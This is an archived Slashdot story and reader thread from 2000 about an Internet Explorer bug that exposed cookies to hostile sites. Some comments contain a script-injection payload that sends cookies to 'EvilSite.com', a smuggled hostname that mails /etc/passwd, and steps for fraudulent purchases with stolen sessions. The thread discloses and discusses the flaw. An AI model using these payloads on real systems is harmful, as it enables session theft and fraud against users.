Follow Slashdot blog updates by subscribing to our blog RSS feed

 



Forgot your password?
typodupeerror
Check out the new SourceForge HTML5 internet speed test! No Flash necessary and runs on all devices. ×
Privacy

MSIE's Cookies Are Public 241

If you're using Microsoft Internet Explorer running on Microsoft Windows, turn off Javascript now. Your cookie file is readable by any hostile website. Or, if you'd like to see the security hole in action, leave Javascript on and check it out: "Open Cookie Jar." (read more)

Peacefire webmaster Bennett Haselton is on a roll. After discovering yesterday's Hotmail hole, today he's published his discovery that MSIE's Javascript contains a bug that allows any hostile website to obtain your cookies.

Essentially the bug is that MSIE's Javascript is not very smart about determining which domain you're coming from. If the URL you're looking at has its "/" characters replaced by the hex representation "%2f", it can be fooled into thinking your path is actually a very long machine name. Because it interprets that path wrongly, a well-placed ".yahoo.com" in the URL can make Javascript think it should be using Yahoo's cookies - and Javascript can be told to deliver those cookies back to the hostile server.

Bennett and I believe the bug is confined to the Javascript code in MSIE, but we have not done extensive testing to determine this. For now, at least, we believe turning off Javascript will be sufficient to eliminate this security hole.

Or, you could migrate to another browser or operating system...

We have only tested this with IE 5, and Windows 95/98. Reports of success or failure with other versions would be welcome.

After Bennett explained to me how this works, I wrote a short CGI script to demonstrate what lurks in cookie files. Instead of silently stealing your private information and squirreling it away for later use, it echoes that information back to you (and then forgets it, of course). Updated: That script has been rewritten by and is now hosted at securityspace.com. For best results, first go log into amazon.com, type your zip code into hollywood.com, and visit playboy.com. Then go visit securityspace's general info page and click the "click here."

Newsbytes and CNET have picked up this story and have good writeups.

This discussion has been archived. No new comments can be posted.

MSIE's Cookies Are Public

Comments Filter:
  • In the face of a government ordered breakup of Microsoft due to anti-competitive measures, Microsoft is doing it again. Microsoft has released the Internet Explorer 5.5 beta recently in order to solicit feedback. One of the new features in IE 5.5 is the integration of the MSN Messenger Service and Outlook Express. There doesn't seem to be a way to turn it off or to replace it with a competing Messenging Service such as ICQ or the AOL Instant Messenging service. I think we should give them some feedback.
  • IE 5.5 beta on win2k doesn't fix anything - it still works fine.
  • Therefore if I can steal the session ID for lets say Amazon I could send you $20000 dollars of books as a joke. That is not funny.

    Of course it's funny.. you could use that _stupid_ "1 click shopping" with someone else's ID.. It'll be easy, fast, _and_ funny..

    (of course, I think it's funny because I use Netscape..)

    --

  • by pod ( 1103 )
    Ditto for IE4 on NT4 (all patched up).
  • > what is M$ bashing FUD and what is a valid opinion?

    What really matters is, how long until a fix is out, and what other problems will the fix introduce?

    --
  • the first thing i did to test this was to log into slashdot with ie (i dont use ie, but its there) and check out my /. cookie, and i noticed that the user number is stored in plaintext (look harder its there) so i theory one could change it and troll with someones karma!

    havent tried this though
  • A quick update: I did a "cut and paste" of the statement made by peacefire.org here on Slashdot and have sent it on to Microsoft's Security team as a high-priority mail message.
  • This bug has been known for at least a year and a half. Check this [ox.ac.uk] out.


  • A post on the NTBugTraq list calls this story a "hoax". Perhaps that's overstating it, but it's a good example of the danger of jumping to conclusions.

    The poster says that the demonstration script uses document.write to display the contents of a cookie in the browser window. Nowhere is it explained how the information might be transmitted back to the server.

    I haven't investigated the code myself, just passing along the comments of others.
  • Mail it to your hotmail account. It will be perfectly safe there.


    ---
  • you're forgetting about "gift shipments".

    step 1: get person's cookie file
    step 2: sign onto ecommerce service as person
    step 3: change the person's default email adress with the service to a hotmail account (so they won't notice the "item hasbeen shipped" thing)
    step 4: mail something, as a "gift", to a P.O. box. they will let you do this.

    If you get lucky no one will notice. Scarily enough, this would work.
  • I also posted something on that article that got lost in the shuffle: a link to an old slashdot article [slashdot.org] about a CERT advisory [cert.org]. Among other things, the advisory asked webmasters to escape/reject all html coming from site users, even if only that one user sees the content.

    Open-source webserver Apache fixed [apache.org] its 404 not found page to escape the name of the URL, but most dynamic websites still haven't fixed all of their code.

    Coincidentally, I had just been reporting a bunch [mozilla.org] of bugs about bugzilla [mozilla.org] (mozilla [mozilla.org]'s bug-tracking system) not being careful with untrusted data when these slashdot articles come up. I'm actually more worried about attacks against mozilla's CVS system than its against its bug-tracking system, but I haven't looked for bugs there yet.

    --

  • Umh... if you are running arbitrary javascript that can display the cookie, then it doesn't take any genius to figure out how to send it somewhere! Like... load a URL on the attacker's server (or a free throwaway account) containing the value of the cookie.
  • Microsofts style of inventing, copyrights, market domination, "care" for customers and all the other nice stories they give us would be a good manuscript for makin one of these bad Hollywood movies about internet, hackers and big bad companies and all the other "scary tings" things they are having in these movies. At least this movie will have som relevance, because it has really happened.

    In 10 years everyone will be laughing at Microsfts infantile, stupid inventions and copyrights.

    With so many bugs, security holes and stupid copyrights, Microsoft is making fools of themselves. How much can IT-managers take before they turn to someone else? If that happens ./ users can start doing something more useful than complaining about software they are not using (ARE YOU???), more than they have to. Maby it won't be that amusing though...

  • If this is occurring even on Apache, then we may have a MAJOR security problem here.

    This could indicate that Javascript (or ECMA-242 script as it's sometimes known) in general can cause a security leak. They better start testing this on Netscape Navigator 3.x and all Netscape Communicator versions NOW to see if Netscape is also vulnerable to this bug.
  • Sure, maybe it will work on some sites. But that is due to other holes that they have. Try it on amazon.com. You won't get far, since they require you enter your password to do that.
  • Heres How...

    1. Write book ( Something catchy and trendy ie. "Whats good for MS is good for America" ).

    2. Build a website to promote your book.

    3. Scan for BN and Amazon cookies from those who visit your site.

    4. Build a LWP Perl script and batch order copies of your book to those fools who visit your site with cookies enabled.

    5. Collect your royalties and move offshore.

  • I am not and advocate for MSIE, or even Netscape both are suck browsers...
    However cookies are an integral part ("standard") of a browser. In fact did you know that the services at Hotmail, and Amazon (one click shop) wouldnt even work without the damn cookies?

    I am sick of cookie bashers, however. Busting out all kinds of hysteria and privacy garbage. There is a bad side to every method. Including secure transactions. Why not just say it like it is for alot of crucial technologies on the net? why not state: "Did you know that every time you do a secure transaction you run a risk of a third party listening and taking your credit card number?" How about we just do a loud campaign that preaches to the world that there pocket book can be stolen if they use the web! Lets really shoot our foot boys!

    If every one knew just how unsafe secure transactions are on the net, we would all be in alot of trouble, and possibly out of work in the long run.

    Nothing is fail proof, or impossible to breach in our web medium... You should all know that by now.

    Keep in mind As a developer sometimes there is only one way to go for a solution.. Technology will change and maybe get better but it wont ever stop the real "hardcore coder". Politics are at large and for now the powers that be are actually in our favor. So lets try and be "Nice" about what we do and say within our medium.

    The Alienx
  • your sarcasm detector seems to be on the fritz...
  • A truck-sized security hole in a Microsoft product? I won't believe that until I see it. Oh, wait...

    -Legion

  • Please remove this exploit of Microsoft from slashdot, Microsoft would rather only let the dangerous criminals know of this, and not their general user base....
    :)

  • That's because you installed the Outlook fix after the Melissa virus came out. You do NOT have a default install of Outlook

    This is not relevant to anything. If you built Slackware when it first appeared, and never installed any patches since then, then
    1 - you have a 'default install of Slackware', and
    2 - you've got more vulnerabilites than you've had hot dinners.

    Failure to patch is not a failure of a given OS, it's a PEBCAK.

    Go to www.microsoft.com, click on Subscribe from the blue bar near the top, and subscribe to the alerting services.

    MS is far from perfect, but failure to automagically patch exploits that don't yet exist is not a valid line of attack against anyone

    TomV

  • someone could steal your slashdot.org cookie and wipe out all your karma by troll posting! :)
  • I just tried the test with IE 5 for Solaris

    I didn't know there was an IE 5 for Solaris - is it better than IE3 for Solaris was?
  • It's people like you that spoil perfectly good software patents for the rest of us! You outta be ashamed of yourself!

    =P

  • I have tried the demo by Jamie (go to Hollywood, etc.) and then a window opens with many frames. All contain "ERROR 205 -- DNS name lookup failure. Please contact your system administrator." from the proxy but for http:/ /www.securityspace.com%2fexploit%2fexploit_1e.html %3fa=.hollywood.com/ [hollywood.com] that has a Hollywood.com window saying "That user doesn't exist".

    When I tried the box and button on Securi ty space [securityspace.com], I get "www.slashdot.org's cookie is:".

    I run IE 4.0 in NT and have Junkbuster set to allow cookies only to sites I trust.
    I also have a company proxy to access the web.

    __
  • I can see this happpening sooner or later.

    Just watch out, because in the distant future, you may bite down on a cookie and find a worm...

  • I just tested this with Windows 2000 running IE5. I saw my cookies from many web sites in a split second. This is sorta scary, but I'm really not so woried about it that I'll turn off javascript. If I did turn off javascript, it would break many sites that I frequent.

    Sure, there could be some malicious code to steal cookies from me, but the chances are extremely small. First, the attacker would have to know what sites I have cookies from on my computer. Even if it did find those cookies, what is the worst it could do? Steal your hotmail account? (I'm sure they couldn't do THAT already). If you use cookies to keep track of really sensitive data, then its your own damn fault.

    So, I'm not turning off javascript, and I'm sure MS will release some patch in a few days fixing this 'feature' of windows and ie.

    -Mike Bell
  • The "hidden" troll forum is currently up to about post #2100, and all of them are genuine posts rather than bot-generated. So you still come in second with about 800 posts :)

  • Are you Bob Gobman of Anytown, USA? I'm John Smith! I live down on Peppermint Lane. We ought to get together some time for a phosphate.
  • I haven't tried but I guess that it doesn't allow untrusted sites access to cookies. But what if a trusted site uses this exploit to access cookies from another trusted site?

    I am confused.
    __
  • Typing this URL
    http://somewhere.com/%2ftest.php3?q=8
    replaces the %2f with a / on my apache server. That's all. I guess there is a problem with your apache configuration. Since you seem to be called Jonathan Clark and the URL apache returns for you contains /jc/, I guess that you have configured apache to go to your jc directory when the URL http://somewhere.com// is used. Just a guess.

  • by MrP- ( 45616 )
    it has been out for a while too..

    Internet Explorer 5 for Solaris with Outlook Express [microsoft.com]

    Internet Explorer 5 for HP-UX with Outlook Express [microsoft.com]

    Internet Explorer 4.01 for Solaris with Outlook Express [microsoft.com]

    Internet Explorer 4.01 for HP-UX with Outlook Express [microsoft.com]

    #----------------------------
    $mrp=~s/mrp/elite god/g;
  • Instead of wasting threads on dumb comments...

    For those of you who are posting this is a hoax, think about it. Yes the peacefire site just displays the cookie information, but this can also be sent to a server.

    So basically, instead of printing out document.cookie you can add it to a url like 'http://www.blah.com/foo.pl?data=' + document.cookie and then have javascript foward to that url, and tada now you have submitted your cookie data to someones perl script, which then can save it to a file, email it to the auther, etc.. so it is not a hoax

    #----------------------------
    $mrp=~s/mrp/elite god/g;
  • I would quit my job immediately if my employer installed filtering software. For God's sake, why would an employer want to forbid their employees from educating themselves?

    It's mostly to stop the idiots in sales from surfing for pr0n.
  • by finkployd ( 12902 ) on Thursday May 11, 2000 @08:27AM (#1077982) Homepage
    Revealing proprietary, trade secrets on a public web site? Let's face it, this is MS, there is no way this is a security hole, they are too "innovative" for that kind of sloppy work to get through. This must be a special "enhancement" they made to the way javascript works, and as such, is covered under the DMCA.

    I'll be it's another letter for you guys :)

    Finkployd

  • ... whether peacefire.org is going to get threatened by Microsoft under the DMCA for releasing these "trade secrets" ?

    OK, here ends the simple "anti-MS" part of the post (fun though it was for me). Please, folks, let's just look at this as simply a data point and a public-service announcement. Yes, it's a hole in IE; it's a safe bet that every significant piece of software's got holes.

    Let's see how fast MS is able to get a patch out; this one's big enough for them to really worry.

  • ROTFLMAO

    OMG. I just can't help thinking 'This is the value of M$'s integration with the OS'

    It makes the Internet all that much closer to you, as well as your machine:in both directions.

    Well, maybe the above thought is incorrect.

    Anyway, I'm thinking something blasphemous. M$ complains that splitting it up will hinder it's ability to 'innovate' and 'compete'. Isn't that the point? If M$ can't expect to release a decent Office or X-Box or IE without access to the OS group, how is Netscape, or Corel, or anyone else expected to 'innovate' and 'compete' if M$ cannot?

    There are people complaining about how breaking up M$ is bad, but I'm wondering, if M$ restructures itself in such a way that the OS department can still freely communicate with the Apps department, but in a way that is public and open, doesn't *everyone* win?

    -AS
  • I am just trying to think of how Mico$oft marketing will try to explain this as a feature....
  • Ahem..Crash Me [slashdot.org], Mellisa, ILoveYou, Hotmail, now this. Leave it to Microsoft to bring innovative new ways to lose all sense of privacy. Seriously though maybe this is an artifact of M$ getting to big? I am a pretty forgiving guy, but they are making to many mistakes for even me to overlook.

    Maybe a breakup is a good thing. Its about time that Micorosoft re-discovers the meaning of the words, pride.. integrity.. fun.. innovation.. excellence. Instead of of their usuall fair which consists of market capitialization, share value, PR, equity.

    Microsoft has alot of good people working for them, and I have had the pleasure of working with some of them. To bad the company's sense of responsibility, and integrity is off smoking a $3 sack of crack.

    My humble opinion.....
    -Nathan

  • by consumer ( 9588 ) on Thursday May 11, 2000 @09:57AM (#1077993)
    Anyone with a packet sniffer can see your cookies. They are not normally encrypted. Web developers should not be putting sensitive information in cookies or using cookies as the only verification needed for secure tasks, like on-line purchases. Sites like Yahoo are very careful to require a password before letting you edit sensitive data, even if you have a cookie.

    With a policy like that, it really doesn't matter if the entire world looks at your cookies.
  • What about Intranets? Companies are using these for a lot of things now, including sensitive strategic and HR data.

    Now anytime a boss visits a hostile web site, he may be giving away the keys to the company's proprietary data. Even if personal web sharing is not allowed, a hostile employee and and outside confederate could easily stir up a lot of trouble.

  • Test your for your Slash Dot Cookie [slashdot.org]

    Mine was choclate chip Mmmmm
  • So anyone can read the document and create an implementation without Microsoft's permission now? They don't have to illegally copy the document or anything. I'm curious to know how the situation stands right now.

  • However, be sure to note that the only reason this stops this particular exploit is because the page is coded to check for the browser. If it wasn't, then simply sending a different User-Agent would be no protection at all.
  • Right. And it has this in the license:
    ...Microsoft grants to you the following...to reproduce and use a reasonable number of copies of the Specification in its entirety for the sole purpose of reviewing the Specification for security analysis...

    Doesn't posting on Slashdot count as this????

  • That beats mine by a longshot. BTW, do you have any references so we know that you didn't keep our passwords? You da man.

    numb
  • by drwiii ( 434 ) on Thursday May 11, 2000 @10:06AM (#1078022)
    I can do that [min.net] with Netscape too.
  • The difference is that anyone (skilled enough) can fix linux problems. Only Microsoft can fix MS problems - if/when they get around to it.

    Besides, bashing M$ is fun. Bashing the under-dog would be seen as cruel!
  • by Erv Walter ( 474 ) on Thursday May 11, 2000 @10:14AM (#1078025) Homepage
    Actually the article just says that you can't get to credit card info or other account maintenance things because you are asked to type a password. This is correct. However, if the user has set up one-click on the computer you stole the cookies from, you probably can one-click order stuff. There is no password required for one-click (just "one click"). It's all based on cookies. Of course, whatever you order will be shipped to the victim and not to you, but you'll still run up their credit card bill :(
  • So does this mean I can grab somebody's Amazon.com cookie, paste it into my own cookie file, and order stuff from Amazon using "One-click"

    Well, yeah, but all the stuff will go to the poor sap whose cookies you stole. Hey, you could order him lots of pr0nography and stuff--let 'im explain that to his significant other.

    unDees

  • Oh and BTW... the whole Kerberos thing? Microsoft released the specs as a trade secret. TRADE SECRETS HAVE NO PROTECTION UNDER THE LAW ONCE THEY ARE LEAKED . That's why they are guarded so viciously.

    So its no longer a trade secret. Its still a copyrighted document and is still protected as such.

  • er.. the /jc/ was a typo on my part - it shouldn't be there.

    As the other poster commented this isn't really a problem with apache, it's IE's fault. IE thinks the hostname from the URL includes the %2f %3f characters - and it's passing this to apache in the request header. What I thought was interesting is the fact that apache unescaped the string. This means that there might be security holes in CGI scripts that expect hostname strings to be safe.

    For example if the unescaped hostname looks like this:

    somewhere.com;`mail s@s.com /etc/passwd`

    and some CGI script does something like this:

    nslookup $HOSTNAME

    you've got a big problem!

  • It posts, but anonymously.

    Rule of thumb: if you want security or privacy, do not use a Microsoft product.

    --
  • ...writing the PHP script so that it makes people's browsers post the following:

    ===================

    Subject: Can You Imagine...
    Body:

    ...a Beowulf Cluster of these?

    Thank you.


    ===================

    You would have earned a place in the annals of Slashdot history.

    Take care,

    Steve



    ========
    Stephen C. VanDahm
  • The default installation does not touch cookies, but it does have some wicked javascript filters. Sure, I get "errors", but I also avoid rollovers, popups and other annoying javascript cluelessness.

    It's totally configurable, you can design any filters you want - but I'm so happy with the default that I just leave it at that. (particularly I like the agent and referer masking.)

  • ...exactly what pod says above. However, since I started this before I saw his/her reply, I'll go ahead and post this as well. ;^) Go to the /. search box at the bottom of this page and type:
    [script]alert("Hi mom!")[/script]
    except use angle brackets instead of square brackets.

    Since search.pl echoes what you type in "Searching blahblahblah" without stripping the JavaScript, you'll get an alertbox when you view the page.

    drwiii's page works like that. That page redirects to something like this URL:

    http://slashdot.org/search.pl?query=[script]loca tion.href = "http://EvilSite.com/cgi-bin/getcookies.pl?data=" + document.cookie;[/script]
    (Actually, the "+" and perhaps the ";" would need to be changed to "%2B" and "%3B" in the URL.) EvilSite's CGI script receives /.'s cookie (in easy-to-parse, semicolon-separated name=value pairs) because the script was actually run from a /. page. (I truly don't mean to say that drwiii is evil in any way.)

    Originally, drwiii's script used /.'s 404 page, which was optimized for people who accidentally made links like this [slashdot.org]. That loophole got closed after the server move.
    --
    New empires...began ebbing and flowing all over the place like Moon Pies on a hot sidewalk.

  • by G27 Radio ( 78394 ) on Thursday May 11, 2000 @12:36PM (#1078047)
    You would have earned a place in the annals of Slashdot history.

    That's OK. I now have the most active user-created sid in Slashdot history :)

    numb
  • I think your post is a bunch of mindless ranting and highly overrated. I don't usually jump to Microsoft's defense but there is no way your post deserved a 5.

    First of all, to the cookie issue: turn off Javascript, OR go into the security settings and disable cookies that are stored on your computer. OR wait a brief moment and Microsoft will have a patch out. OR use any number of 3rd party cookie filtering programs that are out there. Personally I think neither Netscape, nor IE provide sufficient cookie control and management capabilities.

    Also, let's keep some perspective and remember that both IE and Netscape have had vulnerabilities uncovered. They both make mistakes, they both fix them. Let's move on.

    As to the ILOVEYOU stuff - to the best of my knowledge, you had to click on the .vbs file to activate it. You don't go around running executables do you? So this virus/trojan is nothing more than a case of uneducated users trusting something they shouldn't.

    I DO think Microsoft should not allow their script language to poke through your address book. Newbie computer users would be less likely to trust this type of trojan if it wasn't a friend of theirs in the From: field.

    The rest of your rant about the trade secrets and UCITA is nothing more than mindless Slashdot karma whoring. *yawn*

    Best regards,

    SEAL
  • I can't help but think - what if someone grabs my cookie file and mails it to my mother? This is the worst thing to happen since the "History" list in the browsers ...

    ahhhhhhhhck.

    The real security blunder here is sites storing sensitive information in cookies. Idiot moves by microsoft should be anticipated, and _no_ sensitive information should be stored in cookies.

    makes you wonder how long microsoft has been collecting cookies from other web sites ;)

    g
  • A bit offtopic...

    While I don't run Windows or IE, I'm a security-conscious geek, and I'd like to warn my friends and co-workers about this expoit. But my employer of the moment, in order to protect us from evil content, has installed CyberPatrol. As you may know, the fine folks at Peacefire have been having a field day by pointing out the foolishness of censorship programs, and the makers of censorware have (at least in the case of CyberPatrol) responded by adding Peacefire to their blocklists.

    So, all you companies with CyberPatrol installed - your censorship has just made it more difficult for your employees to be informed about a serious security hole.

    Think of it as evolution in action.

  • by EricWright ( 16803 ) on Thursday May 11, 2000 @11:19AM (#1078056) Journal
    Did you get a copy of the ILOVEYOU email or attachment? Did you look at the source code? I did. I can tell you for a fact that you had to open the attachment through Windows Scripting Host for it to do ANYTHING! It was a Visual Basic script. Those don't do anything by themselves. I have a copy of it on my HD, and all my jpgs and mp3s are just fine...

    Go read the article you posted the link to. All references to ILOVEYOU are *COMPARISONS*.

    They quite clearly state: "Email viruses are now spreading WITHOUT THE USER OPENING ANY ATTACHMENT..... This is by far the fastest growing virus distribution problem and ripe for a hugely destructive event - at least as large as the ILOVEYOU virus." They make no claims about ILOVEYOU spreading in this manner. They simply use the havoc-level of ILOVEYOU as a baseline for destructiveness.

    The virus they are referring to in this case is the Kak virus.

    Eric
  • by GNUs-Not-Good ( 130016 ) on Thursday May 11, 2000 @11:24AM (#1078059)
    put the Kerberos spec from MS in my cookie file.

    That way they will be responsible for distributing their own trade secrets through their own security holes.

    Then, they can sue themselves.
  • couldnt someone write a script to instead of outputting the cookies to a local page, it instead adds em to a url like www.foo.com/blah.pl?data=COOKIE_INFORMATION_HERE ..... and then that script can email the cookie data to the author of the javascript... if so this is what to worry about

    #----------------------------
    $mrp=~s/mrp/elite god/g;
  • The default installation of Proxomitron [cjb.net] disables this exploit without sacrificing the Javascript functionality needed to enjoy the majority of sites. Cool.
  • Quoth the poster:
    However cookies are an integral part ("standard") of a browser. In fact did you know that the services at Hotmail, and Amazon (one click shop) wouldnt even work without the damn cookies?
    Yet another reason I don't use Amazon.com anymore. Sites that use cookies need to be explicit about why and how, and then the user could (grudgingly) allow certain ones, from trusted sites, to be set. I complained not long ago to staples.com, and actually received a response indicating that the privacy concerns are forcing them to re-think their requirement of cookies. Maybe there's more hostility than we thought...

    Also quoth the poster:

    There is a bad side to every method. Including secure transactions.
    But you can choose methods that minimize the "bad side" and make it hard to exploit, rather than (as here) relatively easy.

    And yet more from the poster:

    If every one knew just how unsafe secure transactions are on the net, we would all be in alot of trouble, and possibly out of work in the long run.
    Does your personal code of ethics really say that you should keep quiet about known dangers because it might affect your earning potential? How ruthlessly pragmatic! Or... we can raise a ruckus over these sorts of too-simple exploits and, through the glare of publicity, perhaps encourage the people involved to design better products.
  • Quoth the poster:
    Take for example the recent love bug. One came out then 20 more were made over night. Maybe many more would have been made if we went and put the source code on a highly visible site.
    Or maybe, if the Outlook code were open-sourced, overnight a fix and patch would have been developed and distributed... in fact, if the Outlook code were open-sourced, maybe the bug would have been found and fixed before it allowed hundreds of millions of dollars to be lost to productivity shutdowns...
  • You could, you know, tell us when you find a hole, so we could, you know, plug it up and stuff.
  • After what I've seen today, I'm not about to click on that.

    numb
  • Ouch! I guess I'll have to take a hard look at my cookies file, to see who else stores my password in the cookie.

    Hey, /., there is no need at all to store my password in the cookie. A random number, stored in my user record, will work just as well, and (even better) /. can change it periodically -- thus, any replay attacks stop working after a day or so.

    Please fix that. Now. Thank you.

  • What I find interesting is that this bug doesn't appear in the http header support for cookies. This means the http header group and the JavaScript group used different approaches and code to the same problem.

    Why is that interesting? Because, MS is arguing that consumers need MS to remain one company so the OS side and software side can work close together and provide us with more powerful software, and breaking them up would stiffle "innovations" in future products - resulting in less powerful and less user-friendly tools for consumers.

    MS expects people to believe that, when they can't even effectively share algorithms, programming procedures, and code within the same software product?

    MS = BS;

  • by Camel Pilot ( 78781 ) on Thursday May 11, 2000 @11:27AM (#1078090) Homepage Journal
    As was pointed out a lot of sites use cookie to maintain session. Therefore if I can steal the session ID for lets say Amazon I could send you $20000 dollars of books as a joke. That is not funny.

    This hole depreciates the value of "Netscape" cookies which is a nice way to maintain session with a connectionless protocol.
  • ROTFLMAO. OMG. I just can't help thinking 'This is the value of M$'s integration with the OS'.

    If you really want to die of laughter, check out Time's latest piece [time.com], which includes a "viewpoint" by Mr. Gates, defending the very integration you speak of.

    My personal favorite from Gates: "Updates to Windows and Office technologies that could, for example, protect against attacks such as the Love Bug virus would also be much harder for computer users to obtain."


    43rd Law of Computing: Anything that can go wr
  • by Sasquach ( 144074 ) on Thursday May 11, 2000 @08:40AM (#1078098)
    Oh GOSH. Now they have the fake name/address/e-mail I always put on stupid registrations. So let Bob Gobman at 1 Happy St. get all the junk mail destined for me. And let the unfortuneate fellow whos e-mail is bob@bob.bob get all the spam destined for me.

    Is it just me or do people find reasons to get all up and arms for nothing. For all of you how will respond that this is a big deal, remember your name/address AND phone number are all available in your local phone book. And if you are THAT paranoid about common public information, the DON'T POST YOUR REAL DATA!!!
  • This can't be true. The man who sold me my computer said that Windows 2000 would make surfing the internet safer and faster than ever before. He also said that using the email with Wondows 2000 would be safe. First the lovebug and now cookie thieves! I think you people just make this stuff up.

  • I am shocked. This is pathetic.

    If I were the Justice Department (or United Nations, or DoD, or CIA, or FBI, or ANYONE who gave a damn about security ) I would be seriously considering if Microsoft products have any place on my desk, in my office or in my life. The open cookie jar isn't so much what bothers me but this is the straw that brakes this camel's back.

    Microsoft's attitude toward security and toward the end user in general is atrocious. I don't really care what you think, but it IS Microsoft's fault that the default install of Windows 98 using the default mail client simply by reading the ILOVEYOU message will be rendered useless. Now this???? I mean COME ON!

    Oh and BTW... the whole Kerberos thing? Microsoft released the specs as a trade secret. TRADE SECRETS HAVE NO PROTECTION UNDER THE LAW ONCE THEY ARE LEAKED . That's why they are guarded so viciously.

    Oh, and another thing which is completely offtopic: I think that the UCTIA, Section 307, Subsection 2(e) invalidates the GPL!!! It is a description of what kinds of software licenses are valid. It reads "(e) Neither party is entitled to receive copies of source code, schematics, master copy, design material, or other information used by the other party in creating, developing, or implementing the information."
    This would seem to mean that no one needs return code as the GPL demands. What do you guys think???

  • by G27 Radio ( 78394 ) on Thursday May 11, 2000 @08:58AM (#1078102)
    I mentioned this yesterday in the Hotmail thread but it kinda got lost in the shuffle. Slashdot should post an article about the "client-side trojans" discussion that is going on at Zope. Slashdot isn't the only site affected by this--and it's a simple hack:

    WARNING: Clicking this link will cause an article to be posted on Slashdot in your name [sourceforge.net]

    Obviously such a link wouldn't need to warn you what is does, or post such an innocuous message. Maybe I could make it post you slashdot cookies to o :)

    You can see the results in sid=numb [slashdot.org] and there is a link to the source in there too.

    numb
  • I noticed this exploit causes problem with Apache as well. This could possibly cause a security hole somewhere :

    when I specify a URL like this:

    http://www.somewhere.com/test.php3?q=8

    apache correctly reports:

    "Host: www.somewhere.com"

    but when I specify a URL like this:

    http://www.somewhere.com%2ftest.php3%3fq=8

    apache reports:

    "Host: www.somewhere.com/jc/test.php3?q=8"

    This means apache is confused on what host you are trying to reach and virtual hosting will resort to the default hostname. I confirmed this on my web server.

    But... for some reason the cookie exploit doesn't work for me. I tried it on w2k and IE 5.

  • by xDroid ( 115379 ) on Thursday May 11, 2000 @09:02AM (#1078111) Homepage

    HowTo turn-off scripting holes in outlook/IE.
    ------------------------------------------
    In outlook/IE,

    tools -> options -> Security -> Zone settings -> Custom level ->

    under the scripting section disable
    Active scripting,
    Allow Paste operations, and
    Scripting of Java applets.

    Press ok till you are back in outlook/IE.

    then you will not be at risk for a copy-cat ILOVEYOU virus or IE cookie monsters.

    (Of course you all probably did this the first day you opened outlook, right.)
    ------------------------------------------

    PS --
    Here is very nice solution to the .vbs email attachment problem.
    (add .txt to the attachment making it a text file)
    I'm not sure how to implement this in Exchange, though.
    (from Rick Johnson off the saclug.org mailing list)

    -- Andy

  • by MoxCamel ( 20484 ) on Thursday May 11, 2000 @09:04AM (#1078113)
    So does this mean I can grab somebody's Amazon.com cookie, paste it into my own cookie file, and order stuff from Amazon using "One-click"?
  • by mr_death ( 106532 ) on Thursday May 11, 2000 @11:06AM (#1078121)
    Just ran a test with my own amazon account. With 1-click turned on in a previous session:

    1. with my cookies, 1-click enabled.

    2. close browser, remove amazon cookies.

    3. open browser, amazon askes me to log in; no 1-click

    4. close browser, put amazon cookies back

    5. open browser, amazon recognizes me, 1-click enabled, no password required.

    Another reason to turn off 1-click. If you don't, you might find a weird set of books on your doorstep, and one maxed-out credit card.

  • And if you want to still use Javascript at certain sites but not promiscuously ;) get IE power toys (tools) at the microsoft web site and set up the internet zone as the other people have said and set the trusted zone to allow javascript (since some sites won't work at all without javascript).

    The power tools allow you to switch a site into the trusted zone just by clicking

    Tools>Add to Trusted zone

    and you can delete the site from your trusted list in the usual manner (Tools>InternetOptions...>security>trusted sites remove)

    This makes it easier to allow cookies at Slashdot and not at Joe Website who hates all people and will screw them over any chance he gets.
  • by thechink ( 182419 ) on Thursday May 11, 2000 @11:08AM (#1078127)
    HowTo turn-off scripting holes in outlook/IE.

    Sorry but this does not stop the ILUVYOU virus. What you suggest disables scripts in HTML formatted email and that does stop viruses like Bubbleboy for example. It DOES NOT stop scripts sent as email attachments (ala ILUVYOU, Melissa etc) BIG DIFFERENCE. Many people seem to be having trouble understanding this. Scripts in HTML email are run by the IE script engine and are controlled by the settings in Internet Options. These are the kind of scripts that can run in the preview pane automatically. Email attachment scripts are run by the Windows Scripting Host and are run outside of Outlook (or any other emailer) and have to be run by the user. The way to fix this problem is to either remove the WSH or change the default association for VBS and JS script files.
  • by Marc Slemko ( 6200 ) on Thursday May 11, 2000 @11:42AM (#1078135)
    I reported a similar bug to Microsoft on March 19th. My particular example was a URL in the form "http://10.0.0.1%20.msn.com/foo.html" which causes IE to load content from 10.0.0.1 but the Javascript code thinks it is .msn.com; this is a symptom of either the same problem or a very similar one.

    However, they took their time to deal with it. I did not pressure them on it since I had more important things to worry about.
  • You believe that disabling javascript or turning off cookies completely is an acceptable solution to this problem?

    If a security hole is found next week, in something that can't be disabled, will your suggestion be: "what's the big deal don't surf for a while. I'm sure Microsoft will have a patch out soon."

    While the post you're responding to did ramble, I think that a person is justified in being tired of the poor designs force fed to most of the world by Redmond.

    And the idea that we shouldn't get upset, because there will *probably* be a patch to fix the problem makes me sad. With that kind of thinking out there things aren't going to get better any time soon.
  • by bjb ( 3050 ) on Thursday May 11, 2000 @09:11AM (#1078142) Homepage Journal
    I don't know how well the tests were performed, but I just tried the test with IE 5 for Solaris and saw my cookie in all its glory.

    Hmm.. I only have IE for Solaris installed on this box for just such occasions.

    --

  • Yes, I too am impressed and obviously these techniques are pretty common knowledge is certain circles. I'm not saying that wasn't very slick!

    Ah, I'm sure he's trustworthy, but I changed my PW anyway :-)

    I had already, by coicidence, taken the step of linking my cookies file to /dev/null a couple of days ago, and have since been reflecting on the desirability of being able to script my browser so I can set up a quick link to a site that requires cookies, with cookies enabled, then turn them off and delete the cookies as soon as I'm done. I guess I'll use Mozilla for that. Yet another reason why Mozilla is really cool.

    Javascript is now off too. :-) Thanks for the clear demonstration. What a gaping security hole!

    Java is still enabled over here, though. Until somebody demonstrates to me why that's a security risk too...
    --
  • Now you've done it. First you refused to remove posts harmful to Microsoft's reputation and now you're exposing Microsoft trade secrets!

    Is this Slashdot slowdown just a coincidence? I think not. Slashdot is now the victim of an official Microsoft Denial of Service Attack.

    Slashdot has crossed the line and is hurting our American Company's Freedom to Innovate.

    Also, this temporary Explorer snafu makes it quite clear that Microsoft doesn't steal everything from open source!

    blessings,
    Master Bait

  • no, no, far easier:

    mkfs /dev/rwd0a

    -John
  • And here I am trying to dampen paranoia about cookies. (I love the Slashdot FAQ on cookies [slashdot.org].)

    But this bothers me and sounds similar to the bug reported at CookieCentral [cookiecentral.com] a long time ago. I'm trying to digest how this is different and what danger (and likelihood of appearance) this represents "in the wild".

    Answers here or to me by email would be appreciated.

  • "As to the ILOVEYOU stuff - to the best of my knowledge, you had to click on the .vbs file to activate it. You don't go around running executables do you? So this virus/trojan is nothing more than a case of uneducated users trusting something they shouldn't."

